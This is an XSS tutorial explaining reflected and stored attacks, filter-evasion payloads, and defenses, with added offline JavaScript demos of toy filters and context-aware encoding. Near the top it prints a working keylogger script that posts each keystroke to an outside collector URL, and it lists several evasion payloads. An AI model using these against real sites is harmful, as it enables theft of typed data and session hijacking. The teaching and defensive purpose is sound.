Cross Site Scripting (XSS)
XSS is a type of injection attack that tries to execute a foreign piece of JavaScript in another person's browser.
XSS has two victims. The first is the website/service that allows an attacker to "lay the trap" for the site's users. The second is the end user who navigates to a page where JavaScript is being executed from a seemingly trustworthy source (the site's own origin), so it runs with that site's cookies and session.
The possibilities of what an XSS attack can accomplish are huge.
You could set up a keylogger:
/*
Simple javascript keylogger by Th3_M4d_H4tt3r
*/
// Runs in the victim's browser once injected: every key press is POSTed,
// one character per request, to the attacker-controlled collector URL.
document.onkeypress = function(evt) {
    evt = evt || window.event;                    // old-IE fallback
    var key = String.fromCharCode(evt.charCode);  // declared locally, not as an implicit global
    if (key) {
        var http = new XMLHttpRequest();
        // encodeURIComponent rather than encodeURI: keys such as '&' and '='
        // would otherwise corrupt the form body
        var param = encodeURIComponent(key);
        http.open("POST", "http://pyworm.noads.biz/keylogger.php", true);
        http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        http.send("key=" + param);
    }
};
or steal cookie information via document.cookie, or redirect the victim to another page (window.location.assign()), etc.
There are two main categories: Reflected and Stored.
Reflected is when the script arrives in the request itself (a URL/GET parameter, a form field) and the server echoes it straight back into the response without storing it. For a reflected attack a URL has to be crafted and delivered to the victim (email, IM, etc.), and it fires only for whoever follows that link.
Stored is when the script is saved in the website's database and is executed for every visitor each time the page that renders it loads.
Example:
Save a script as your first name. Then anytime someone views your profile the script fires.
The simplest payload to test with is
<script>alert(1)</script>
Most filters will catch this nowadays, so don't expect to hack the planet with it.
Google "XSS filter evasion" if you want to find a whole lot of tricks that people are doing to bypass all the different filters out there.
Some interesting filter evasions:
<scr<script>ipt>alert(1)</scr</script>ipt>
This can be used if you see that a filter is stripping out <script> tags: if it removes them once and concatenates the remaining substrings without re-checking the result, the inner tag is removed and the outer pieces join up into a fresh <script> tag, so your attack lands.
Use a character encoder, like this one: http://ha.ckers.org/xsscalc.html. It turns this
<script>alert(1)</script>
into this
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
This only helps when the filter inspects the raw, still-encoded input and the application (or the browser) decodes it afterwards; a filter that decodes before it checks sees exactly the same <script> tag.
Using HTML attributes to initiate javascript can be used if you cannot get the <script> tags past the filter.
<img src=x onerror=alert(1)>
<img src=x onmouseover=alert(1)>
<img src=javascript:alert(1)>
(The javascript: URL in an img src only fired in very old browsers; current browsers refuse it, so prefer the event-handler forms above.)
Obfuscation is the practice of obscuring the code with extraneous information that will allow the attack to slip by the filter:
<img src=`javascript:alert(1)`>
<body onload!#$)*~+-_.,`=alert(1)>
Both of these rely on lax attribute parsing in legacy browsers (backtick-quoted attribute values were an IE-only behaviour), so confirm them against the target's browser before counting on them.
The most important thing to keep in mind is that if a tactic is on a public evasion sheet, the filter makers know about it, but I've found that I have more luck if I mix one, two, or three of the evasion tactics into a single attack.
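The bypasses above can be reproduced against a toy filter. The following is an added example, not code from the original write-up: it implements the single-pass <script> stripper described for the nested-tag trick, a loop-until-stable variant, and a server that filters the raw query string before URL-decoding it. The payloads are the constructed ones quoted above and nothing is sent anywhere.

```javascript
// Added example (not code from the original write-up): a toy blacklist filter
// of the kind the text describes, so the bypasses quoted above can be checked
// offline. All payloads are constructed; nothing is sent to any server.

// Single-pass filter: deletes each literal <script> / </script> once and
// concatenates what is left without re-checking the result.
function stripScriptTagsOnce(input) {
  return input.replace(/<\/?script>/gi, "");
}

// Loop-until-stable variant: defeats the nested-tag trick, but it still only
// knows about one tag name, so event-handler attributes pass straight through.
function stripScriptTagsRepeated(input) {
  let previous;
  let current = input;
  do {
    previous = current;
    current = previous.replace(/<\/?script>/gi, "");
  } while (current !== previous);
  return current;
}

// Models a server that runs the filter over the raw query string *before*
// URL-decoding it, then decodes and reflects the result into the page.
function filterThenDecode(rawParam, filter) {
  return decodeURIComponent(filter(rawParam));
}

// Rough check of what survived: a <script> tag or an on*= event handler.
// (Good enough for the demonstration; it is not itself a filter to ship.)
function looksExecutable(html) {
  return /<script\b/i.test(html) || /\son\w+\s*=/i.test(html);
}

// The payloads from the write-up, verbatim.
const payloads = {
  plain: "<script>alert(1)</script>",
  nested: "<scr<script>ipt>alert(1)</scr</script>ipt>",
  handler: "<img src=x onerror=alert(1)>",
  urlEncoded: "%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E",
};

// Returns results[filterName][payloadName] = true if the payload still looks
// executable after passing through that filter.
function evaluateFilters() {
  const filters = { once: stripScriptTagsOnce, repeated: stripScriptTagsRepeated };
  const results = {};
  for (const [filterName, filter] of Object.entries(filters)) {
    results[filterName] = {};
    for (const [payloadName, payload] of Object.entries(payloads)) {
      // The URL-encoded payload is what arrives on the wire; the others are
      // already decoded, so they go through the filter directly.
      const rendered = payloadName === "urlEncoded"
        ? filterThenDecode(payload, filter)
        : filter(payload);
      results[filterName][payloadName] = looksExecutable(rendered);
    }
  }
  return results;
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(evaluateFilters());
}
```

Run it with node. The looping version only defeats the nested tag; the event-handler attribute and the filter-before-decode bypass go through both filters, which is why the Defense tips below lean on output encoding rather than on a blacklist.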
Defense tips
HTML encoding is usually the first thing people reach for:
PHP's htmlentities() (pass ENT_QUOTES so single quotes are escaped too; before PHP 8.1 the default left them alone)
.NET 4's System.Net.WebUtility.HtmlEncode
But there are also some other best practices that you can use to help keep your site secure.
1. Know every place on your site where outside data is rendered (every page, error message and template that echoes it).
2. Know the default storage state of information: note which database columns hold raw, unescaped input, so nothing is trusted just because it came out of your own database.
3. Be aware that HTML encoding, JavaScript (hex/unicode) escaping, and URL encoding are different things, and apply the one that matches the context the data lands in (HTML body, attribute value, script block, URL parameter).
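To make points 1 to 3 concrete, here is an added example in JavaScript (not code from the original write-up; the helper names encodeForHtml and encodeForUrlParam are my own stand-ins for library routines such as htmlentities() or WebUtility.HtmlEncode). It renders the stored-XSS profile scenario from earlier, with the first name in a heading, in an attribute and in a link, and shows why one HTML-encoding routine is safe in a quoted attribute but insufficient in an unquoted one, and why the URL context needs percent-encoding first.

```javascript
// Added example, not code from the original write-up. Helper names are my own
// stand-ins for whatever your framework provides. Runs offline with node;
// the payloads are constructed.

// HTML text and quoted-attribute context: encode the five characters that can
// close a text node or a quoted attribute. Quotes are included deliberately;
// PHP's htmlentities() leaves single quotes alone unless ENT_QUOTES is passed.
function encodeForHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// URL query-parameter context needs percent-encoding, not HTML encoding.
// The result is HTML-encoded again afterwards because it lands in an href.
function encodeForUrlParam(value) {
  return encodeURIComponent(String(value));
}

// The stored-XSS scenario from the text: the first name is rendered in three
// contexts. `quoted` toggles whether the attribute value is quoted.
function renderProfile(firstName, { quoted = true } = {}) {
  const safe = encodeForHtml(firstName);
  const attr = quoted ? `"${safe}"` : safe;   // unquoted: a space ends the value
  return `<h1>${safe}</h1>\n` +
         `<input name="first_name" value=${attr}>\n` +
         `<a href="/profile?name=${encodeForHtml(encodeForUrlParam(firstName))}">link</a>`;
}

// Minimal quote-aware attribute tokenizer used only to inspect the rendered
// <input> tag: returns the attribute names a browser would see on it.
// A demonstration helper, not an HTML parser to rely on in production.
function inputAttributeNames(html) {
  const tag = html.match(/<input\b[^>]*>/i)[0];
  const inner = tag.replace(/^<input\s*/i, "").replace(/>$/, "");
  const re = /([^\s="'>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Number of element start tags in the output; the template itself has three,
// so any higher count means user data introduced a tag.
const TEMPLATE_TAGS = 3;
function countStartTags(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

if (typeof require !== "undefined" && require.main === module) {
  const payload = "x onerror=alert(1)";
  console.log("quoted attribute  :", inputAttributeNames(renderProfile(payload)));
  console.log("unquoted attribute:", inputAttributeNames(renderProfile(payload, { quoted: false })));
  console.log(renderProfile("<script>alert(1)</script>"));
}
```

The payload x onerror=alert(1) contains none of the five encoded characters, so encodeForHtml returns it unchanged; inside a quoted attribute that is harmless, inside an unquoted one the browser reads a second attribute named onerror. That is the practical meaning of point 3: the encoder has to match the context, and the template has to give the encoder a context it can actually protect.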